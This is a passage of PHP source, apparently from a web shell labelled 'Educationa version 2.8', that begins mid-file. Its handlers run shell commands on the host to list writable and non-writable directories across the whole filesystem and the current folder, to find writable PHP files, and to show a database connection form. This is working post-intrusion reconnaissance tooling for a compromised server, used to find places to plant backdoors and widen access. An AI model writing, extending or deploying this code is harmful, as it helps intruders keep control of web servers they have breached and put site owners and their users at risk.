    '; if (is_ajax()) { ob_end_flush(); exit; } $_SESSION['action'] = 'viewer'; echo ''; } if ($action === 'writable_paths') { $sort_by = $_POST['sort_by'] ?? 'string'; $sort_cmd = match ($sort_by) { 'size' => '| sort -k2 -nr', 'date' => '| sort -k3 -nr', default => '| sort -k1 -nr' }; $cmd = 'find / -type d -writable -exec stat --format="%n %s %Y" {} + 2>/dev/null | grep -vE "^\./?\.$" | awk \'{print length($1) " " $2 " " $3 " " $1}\' ' . $sort_cmd . ' | awk \'{print $1 " " $2 " " strftime("%b_%d_%Y_%I:%M%p", $3) " " $4}\''; $output = shell_exec_alternative($cmd, true); if (empty($output)) { $output = 'No writable paths found'; } else { $lines = explode("\n", trim($output)); $formatted_output = ''; foreach ($lines as $line) if (preg_match('/^(\d+)\s+(\d+)\s+(.+?)\s+(.+)$/', $line, $matches)) $formatted_output .= "Len:{$matches[1]} " . format_size($matches[2]) . " {$matches[3]} {$matches[4]}\n"; $output = $formatted_output ?: 'No writable paths found'; } echo '

    All Writable Paths [Sorted by ' . htmlspecialchars($sort_by) . ']

    ' . htmlspecialchars($output) . '
    '; $_SESSION['action'] = 'viewer'; } if ($action === 'writable_paths_current') { $target_dir = realpath($_SESSION['dir']); $sort_by = $_POST['sort_by'] ?? 'string'; if (!$target_dir || !is_dir($target_dir)) { echo '

    Writable Paths (Current Directory)

    Invalid directory: ' . htmlspecialchars($_SESSION['dir']) . '
    '; } else { $sort_cmd = match ($sort_by) { 'size' => '| sort -k2 -nr', 'date' => '| sort -k3 -nr', default => '| sort -k1 -nr' }; $cmd = 'find ' . escapeshellarg($target_dir) . ' -type d -writable -exec stat --format="%n %s %Y" {} + 2>/dev/null | grep -vE "^\./?\.$" | awk \'{print length($1) " " $2 " " $3 " " $1}\' ' . $sort_cmd . ' | awk \'{print $1 " " $2 " " strftime("%b_%d_%Y_%I:%M%p", $3) " " $4}\''; $output = shell_exec_alternative($cmd, true); if (empty($output)) { $output = 'No writable paths found'; } else { $lines = explode("\n", trim($output)); $formatted_output = ''; foreach ($lines as $line) if (preg_match('/^(\d+)\s+(\d+)\s+(.+?)\s+(.+)$/', $line, $matches)) $formatted_output .= "Len:{$matches[1]} " . format_size($matches[2]) . " {$matches[3]} {$matches[4]}\n"; $output = $formatted_output ?: 'No writable paths found'; } echo '

    Writable Paths (' . htmlspecialchars($target_dir) . ') [Sorted by ' . htmlspecialchars($sort_by) . ']

    ' . htmlspecialchars($output) . '
    '; } $_SESSION['action'] = 'viewer'; } if ($action === 'non_writable_paths_current') { $target_dir = realpath($_SESSION['dir']); $sort_by = $_POST['sort_by'] ?? 'string'; if (!$target_dir || !is_dir($target_dir)) { echo '

    Non-Writable Paths (Current Directory)

    Invalid directory: ' . htmlspecialchars($_SESSION['dir']) . '
    '; } else { $sort_cmd = match ($sort_by) { 'size' => '| sort -k2 -nr', 'date' => '| sort -k3 -nr', default => '| sort -k1 -nr' }; $cmd = 'find ' . escapeshellarg($target_dir) . ' -type d ! -writable -exec stat --format="%n %s %Y" {} + 2>/dev/null | grep -vE "^\./?\.$" | awk \'{print length($1) " " $2 " " $3 " " $1}\' ' . $sort_cmd . ' | awk \'{print $1 " " $2 " " strftime("%b_%d_%Y_%I:%M%p", $3) " " $4}\''; $output = shell_exec_alternative($cmd, true); if (empty($output)) { $output = 'No non-writable paths found'; } else { $lines = explode("\n", trim($output)); $formatted_output = ''; foreach ($lines as $line) if (preg_match('/^(\d+)\s+(\d+)\s+(.+?)\s+(.+)$/', $line, $matches)) $formatted_output .= "Len:{$matches[1]} " . format_size($matches[2]) . " {$matches[3]} {$matches[4]}\n"; $output = $formatted_output ?: 'No non-writable paths found'; } echo '

    Non-Writable Paths (' . htmlspecialchars($target_dir) . ') [Sorted by ' . htmlspecialchars($sort_by) . ']

    ' . htmlspecialchars($output) . '
    '; } $_SESSION['action'] = 'viewer'; } if ($action === 'writable_php_files') { $target_dir = realpath($_SESSION['dir']); $sort_by = $_POST['sort_by'] ?? 'string'; if (!$target_dir || !is_dir($target_dir)) { echo '

    Writable PHP Files (Current Directory)

    Invalid directory: ' . htmlspecialchars($_SESSION['dir']) . '
    '; } else { $sort_cmd = match ($sort_by) { 'size' => '| sort -k2 -nr', 'date' => '| sort -k3 -nr', default => '| sort -k1 -nr' }; $cmd = 'find ' . escapeshellarg($target_dir) . ' -type f -name "*.php" -writable -exec stat --format="%n %s %Y" {} + 2>/dev/null | awk \'{print length($1) " " $2 " " $3 " " $1}\' ' . $sort_cmd . ' | awk \'{print $1 " " $2 " " strftime("%b_%d_%Y_%I:%M%p", $3) " " $4}\''; $output = shell_exec_alternative($cmd, true); if (empty($output)) { $output = 'No writable PHP files found'; } else { $lines = explode("\n", trim($output)); $formatted_output = ''; foreach ($lines as $line) if (preg_match('/^(\d+)\s+(\d+)\s+(.+?)\s+(.+)$/', $line, $matches)) $formatted_output .= "Len:{$matches[1]} " . format_size($matches[2]) . " {$matches[3]} {$matches[4]}\n"; $output = $formatted_output ?: 'No writable PHP files found'; } echo '

    Writable PHP Files (' . htmlspecialchars($target_dir) . ') [Sorted by ' . htmlspecialchars($sort_by) . ']

    ' . htmlspecialchars($output) . '
    '; } $_SESSION['action'] = 'viewer'; } if ($action === 'conn_db') { echo '
    Host:
    User:
    Password:
    Database:
    '; $_SESSION['action'] = 'viewer'; } ?>
    Educationa version 2.8